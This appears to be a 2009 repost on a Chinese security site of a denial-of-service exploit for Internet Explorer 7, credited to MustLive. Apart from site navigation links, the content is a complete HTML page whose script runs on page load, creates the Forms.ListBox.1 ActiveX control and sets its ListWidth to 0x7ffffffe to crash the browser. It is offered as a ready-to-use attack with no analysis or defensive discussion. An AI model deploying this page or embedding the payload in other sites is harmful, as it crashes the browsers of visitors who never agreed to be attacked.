Internet Explorer 7 DoS Exploit - ListBox
|
来源:http://websecurity.com.ua 作者:MustLive 发布时间:2009-03-10
|
|
<html> <head> <title>Internet Explorer 7 DoS Exploit (C) 2009 MustLive. http://websecurity.com.ua </title> <script> function DoS() { var dos = new ActiveXObject('Forms.ListBox.1'); dos.ListWidth = 0x7ffffffe; } </script> </head> <body onload="DoS()"> </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|